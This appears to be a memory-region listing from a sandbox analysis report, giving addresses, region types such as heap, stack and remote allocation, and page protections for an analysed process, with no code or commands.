14013F000
|
unkown
|
page execute and read and write
|
||
270C79A1000
|
trusted library allocation
|
page read and write
|
||
232004BE000
|
heap
|
page read and write
|
||
1EEBF970000
|
heap
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
270DEE8E000
|
heap
|
page read and write
|
||
7FFD3484C000
|
trusted library allocation
|
page execute and read and write
|
||
1D85E000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
232002C0000
|
heap
|
page read and write
|
||
1D3FE000
|
stack
|
page read and write
|
||
7FFD34951000
|
trusted library allocation
|
page read and write
|
||
1EEB7954000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
2373DC35000
|
heap
|
page read and write
|
||
23200421000
|
heap
|
page read and write
|
||
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
23267991000
|
trusted library allocation
|
page read and write
|
||
23265760000
|
heap
|
page read and write
|
||
3A7E000
|
stack
|
page read and write
|
||
29DD571D000
|
trusted library allocation
|
page read and write
|
||
232003C0000
|
heap
|
page read and write
|
||
23725325000
|
heap
|
page read and write
|
||
140141000
|
remote allocation
|
page execute and read and write
|
||
1EEBF9D8000
|
heap
|
page read and write
|
||
23724D00000
|
heap
|
page read and write
|
||
185F000
|
stack
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
14041F000
|
unkown
|
page execute and read and write
|
||
270C7A03000
|
trusted library allocation
|
page read and write
|
||
140454000
|
remote allocation
|
page execute and read and write
|
||
798DC73000
|
stack
|
page read and write
|
||
29DD3E50000
|
trusted library allocation
|
page read and write
|
||
7FFD34866000
|
trusted library allocation
|
page execute and read and write
|
||
232677B8000
|
trusted library allocation
|
page read and write
|
||
1D1E000
|
stack
|
page read and write
|
||
29DD41C9000
|
trusted library allocation
|
page read and write
|
||
1EEA75EF000
|
trusted library allocation
|
page read and write
|
||
EF43A0C000
|
stack
|
page read and write
|
||
29DEC7F9000
|
heap
|
page read and write
|
||
29DE429A000
|
trusted library allocation
|
page read and write
|
||
F8D14FE000
|
stack
|
page read and write
|
||
29DEC768000
|
heap
|
page read and write
|
||
1D620000
|
heap
|
page read and write
|
||
232678D6000
|
trusted library allocation
|
page read and write
|
||
1EEBFC4C000
|
heap
|
page read and write
|
||
23200684000
|
heap
|
page read and write
|
||
F0C000
|
heap
|
page read and write
|
||
2327781D000
|
trusted library allocation
|
page read and write
|
||
149F000
|
heap
|
page read and write
|
||
137B000
|
heap
|
page read and write
|
||
40A2000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
232658F0000
|
heap
|
page read and write
|
||
270C6145000
|
heap
|
page read and write
|
||
140262000
|
unkown
|
page execute and read and write
|
||
7FFD34AB2000
|
trusted library allocation
|
page read and write
|
||
1EEB70C1000
|
trusted library allocation
|
page read and write
|
||
23267911000
|
trusted library allocation
|
page read and write
|
||
7FFD34C10000
|
trusted library allocation
|
page read and write
|
||
1EEA75D6000
|
trusted library allocation
|
page read and write
|
||
23267917000
|
trusted library allocation
|
page read and write
|
||
BD4FDFF000
|
stack
|
page read and write
|
||
2326762B000
|
trusted library allocation
|
page read and write
|
||
232679D4000
|
trusted library allocation
|
page read and write
|
||
237356DB000
|
trusted library allocation
|
page read and write
|
||
270C77BC000
|
trusted library allocation
|
page read and write
|
||
7FFD349A2000
|
trusted library allocation
|
page read and write
|
||
237253D1000
|
trusted library allocation
|
page read and write
|
||
270DEE19000
|
heap
|
page read and write
|
||
29DD5059000
|
trusted library allocation
|
page read and write
|
||
29DD388D000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
1EEBFCFD000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
7FFD3499A000
|
trusted library allocation
|
page read and write
|
||
29DEC6C0000
|
heap
|
page read and write
|
||
23277CC9000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
14A2000
|
heap
|
page read and write
|
||
7FFD34BA0000
|
trusted library allocation
|
page read and write
|
||
3E05000
|
trusted library allocation
|
page read and write
|
||
7FFD34B08000
|
trusted library allocation
|
page read and write
|
||
1EEBFC5D000
|
heap
|
page read and write
|
||
FC8000
|
heap
|
page read and write
|
||
270DEC30000
|
heap
|
page read and write
|
||
14022000
|
trusted library allocation
|
page read and write
|
||
7FFD3493E000
|
trusted library allocation
|
page read and write
|
||
7FFD34942000
|
trusted library allocation
|
page read and write
|
||
139D000
|
heap
|
page read and write
|
||
7FFD34C10000
|
trusted library allocation
|
page read and write
|
||
13CAA000
|
trusted library allocation
|
page read and write
|
||
3CE7000
|
trusted library allocation
|
page read and write
|
||
2327799D000
|
trusted library allocation
|
page read and write
|
||
1EEA72FD000
|
trusted library allocation
|
page read and write
|
||
7FFD349E9000
|
trusted library allocation
|
page read and write
|
||
1EEA73F3000
|
trusted library allocation
|
page read and write
|
||
232005FC000
|
heap
|
page read and write
|
||
3F90000
|
trusted library allocation
|
page read and write
|
||
7FFD34BA0000
|
trusted library allocation
|
page read and write
|
||
7FFD349B4000
|
trusted library allocation
|
page read and write
|
||
237266D2000
|
trusted library allocation
|
page read and write
|
||
270C6010000
|
heap
|
page read and write
|
||
7FFD34B90000
|
trusted library allocation
|
page read and write
|
||
1D79F000
|
heap
|
page read and write
|
||
1EEBFA70000
|
heap
|
page read and write
|
||
1D4D1000
|
heap
|
page read and write
|
||
2373D8D3000
|
heap
|
page read and write
|
||
1BDA0000
|
trusted library allocation
|
page read and write
|
||
23200521000
|
heap
|
page read and write
|
||
1EEA72BA000
|
trusted library allocation
|
page read and write
|
||
1EEA75B1000
|
trusted library allocation
|
page read and write
|
||
1D658000
|
heap
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
1D7E1000
|
heap
|
page read and write
|
||
13C7000
|
heap
|
page read and write
|
||
F8D11FF000
|
stack
|
page read and write
|
||
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
270C5EAA000
|
heap
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349CD000
|
trusted library allocation
|
page read and write
|
||
29DEC8E0000
|
trusted library allocation
|
page read and write
|
||
7FFD347AB000
|
trusted library allocation
|
page read and write
|
||
232000F1000
|
heap
|
page read and write
|
||
1D83A000
|
heap
|
page read and write
|
||
136FA000
|
trusted library allocation
|
page read and write
|
||
7FFD34926000
|
trusted library allocation
|
page read and write
|
||
215E000
|
stack
|
page read and write
|
||
D88B087000
|
stack
|
page read and write
|
||
137D9000
|
trusted library allocation
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
7FFD34BB0000
|
trusted library allocation
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
1360000
|
heap
|
page read and write
|
||
2320017A000
|
heap
|
page read and write
|
||
1EEA766E000
|
trusted library allocation
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1D86C000
|
heap
|
page read and write
|
||
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
F4E000
|
heap
|
page read and write
|
||
1D55E000
|
heap
|
page read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
2320044E000
|
heap
|
page read and write
|
||
23265B4B000
|
heap
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
1EEBFDA2000
|
heap
|
page read and write
|
||
3C22000
|
trusted library allocation
|
page read and write
|
||
1EEBFCA6000
|
heap
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
7FFD34AD3000
|
trusted library allocation
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
7FFD34958000
|
trusted library allocation
|
page read and write
|
||
23725FD2000
|
trusted library allocation
|
page read and write
|
||
140412000
|
remote allocation
|
page execute and read and write
|
||
29DD4FCE000
|
trusted library allocation
|
page read and write
|
||
23200467000
|
heap
|
page read and write
|
||
EB3000
|
heap
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
1EEBFBFD000
|
heap
|
page read and write
|
||
23200611000
|
heap
|
page read and write
|
||
1EEB7805000
|
trusted library allocation
|
page read and write
|
||
23200339000
|
heap
|
page read and write
|
||
14037F000
|
remote allocation
|
page execute and read and write
|
||
232676DB000
|
trusted library allocation
|
page read and write
|
||
D88B10C000
|
stack
|
page read and write
|
||
140179000
|
unkown
|
page execute and read and write
|
||
14047D000
|
unkown
|
page execute and read and write
|
||
1EEA72D5000
|
trusted library allocation
|
page read and write
|
||
1D6A9000
|
heap
|
page read and write
|
||
140799000
|
remote allocation
|
page execute and read and write
|
||
798D9DE000
|
stack
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
1402CC000
|
remote allocation
|
page execute and read and write
|
||
1EEA73B8000
|
trusted library allocation
|
page read and write
|
||
3DF2000
|
trusted library allocation
|
page read and write
|
||
29DD535B000
|
trusted library allocation
|
page read and write
|
||
1EEA7697000
|
trusted library allocation
|
page read and write
|
||
798E37C000
|
stack
|
page read and write
|
||
29DD4F3D000
|
trusted library allocation
|
page read and write
|
||
7FFD347C4000
|
trusted library allocation
|
page read and write
|
||
1EEB78A6000
|
trusted library allocation
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
1D630000
|
heap
|
page read and write
|
||
7FFD347DC000
|
trusted library allocation
|
page execute and read and write
|
||
1EEBFA73000
|
heap
|
page read and write
|
||
7FFD34A15000
|
trusted library allocation
|
page read and write
|
||
3C3A000
|
trusted library allocation
|
page read and write
|
||
1D850000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
270DEF1C000
|
heap
|
page read and write
|
||
7FFD34B10000
|
trusted library allocation
|
page read and write
|
||
1D3D0000
|
heap
|
page read and write
|
||
1EEB77F1000
|
trusted library allocation
|
page read and write
|
||
7FFD34856000
|
trusted library allocation
|
page read and write
|
||
1EEBFA32000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1D040000
|
heap
|
page read and write
|
||
270C5E5F000
|
heap
|
page read and write
|
||
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
7FFD34B0C000
|
trusted library allocation
|
page read and write
|
||
140294000
|
remote allocation
|
page execute and read and write
|
||
2C8B5625000
|
heap
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
1EEBFDD8000
|
heap
|
page read and write
|
||
1EEA58BE000
|
heap
|
page read and write
|
||
29DEC41A000
|
heap
|
page read and write
|
||
7FFD34984000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
270D6A0B000
|
trusted library allocation
|
page read and write
|
||
9385DFF000
|
stack
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
1EEA55C0000
|
trusted library allocation
|
page read and write
|
||
2C8B5590000
|
heap
|
page read and write
|
||
1EEBF9CF000
|
heap
|
page read and write
|
||
232000DE000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
7FFD347BD000
|
trusted library allocation
|
page execute and read and write
|
||
23277D0F000
|
trusted library allocation
|
page read and write
|
||
2373DB18000
|
heap
|
page read and write
|
||
232659D6000
|
heap
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
23735401000
|
trusted library allocation
|
page read and write
|
||
13EEA000
|
trusted library allocation
|
page read and write
|
||
1C72A000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
D88A3BE000
|
stack
|
page read and write
|
||
232000B7000
|
heap
|
page read and write
|
||
13A01000
|
trusted library allocation
|
page read and write
|
||
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
14047B000
|
remote allocation
|
page execute and read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
1C4EC000
|
stack
|
page read and write
|
||
2326778B000
|
trusted library allocation
|
page read and write
|
||
3CA3000
|
trusted library allocation
|
page read and write
|
||
1EEBFAE2000
|
heap
|
page read and write
|
||
EF42AB7000
|
stack
|
page read and write
|
||
237253C0000
|
heap
|
page execute and read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
1CAF5000
|
heap
|
page read and write
|
||
7FFD34783000
|
trusted library allocation
|
page execute and read and write
|
||
237271CC000
|
trusted library allocation
|
page read and write
|
||
143BF000
|
trusted library allocation
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349A6000
|
trusted library allocation
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
3BAF000
|
trusted library allocation
|
page read and write
|
||
14034E000
|
remote allocation
|
page execute and read and write
|
||
40B0000
|
trusted library allocation
|
page read and write
|
||
2C8B5620000
|
heap
|
page read and write
|
||
7DF42FE10000
|
trusted library allocation
|
page execute and read and write
|
||
23724C57000
|
heap
|
page read and write
|
||
1EEA74B0000
|
trusted library allocation
|
page read and write
|
||
7FFD34C20000
|
trusted library allocation
|
page read and write
|
||
1D62D000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
23726762000
|
trusted library allocation
|
page read and write
|
||
270C781F000
|
trusted library allocation
|
page read and write
|
||
7FFD34984000
|
trusted library allocation
|
page read and write
|
||
270C7F89000
|
trusted library allocation
|
page read and write
|
||
140465000
|
remote allocation
|
page execute and read and write
|
||
798EF47000
|
stack
|
page read and write
|
||
2373DA90000
|
heap
|
page execute and read and write
|
||
29DEC4EA000
|
heap
|
page read and write
|
||
7FFD349E9000
|
trusted library allocation
|
page read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
23725230000
|
trusted library allocation
|
page read and write
|
||
7FFD34AE9000
|
trusted library allocation
|
page read and write
|
||
7FFD349A4000
|
trusted library allocation
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
29DEC764000
|
heap
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1713000
|
heap
|
page execute and read and write
|
||
3E79000
|
trusted library allocation
|
page read and write
|
||
140297000
|
remote allocation
|
page execute and read and write
|
||
29DEC434000
|
heap
|
page read and write
|
||
23726670000
|
trusted library allocation
|
page read and write
|
||
14301000
|
trusted library allocation
|
page read and write
|
||
1EEA75D0000
|
trusted library allocation
|
page read and write
|
||
D889BEF000
|
stack
|
page read and write
|
||
3D4B000
|
trusted library allocation
|
page read and write
|
||
237265A4000
|
trusted library allocation
|
page read and write
|
||
270C84D7000
|
trusted library allocation
|
page read and write
|
||
1915000
|
heap
|
page read and write
|
||
232775C5000
|
trusted library allocation
|
page read and write
|
||
29DD387F000
|
heap
|
page read and write
|
||
EAF000
|
heap
|
page read and write
|
||
270DEB95000
|
heap
|
page read and write
|
||
270C6701000
|
trusted library allocation
|
page read and write
|
||
1EEA74A4000
|
trusted library allocation
|
page read and write
|
||
3960000
|
heap
|
page execute and read and write
|
There are 1714 hidden memdumps, click here to show them.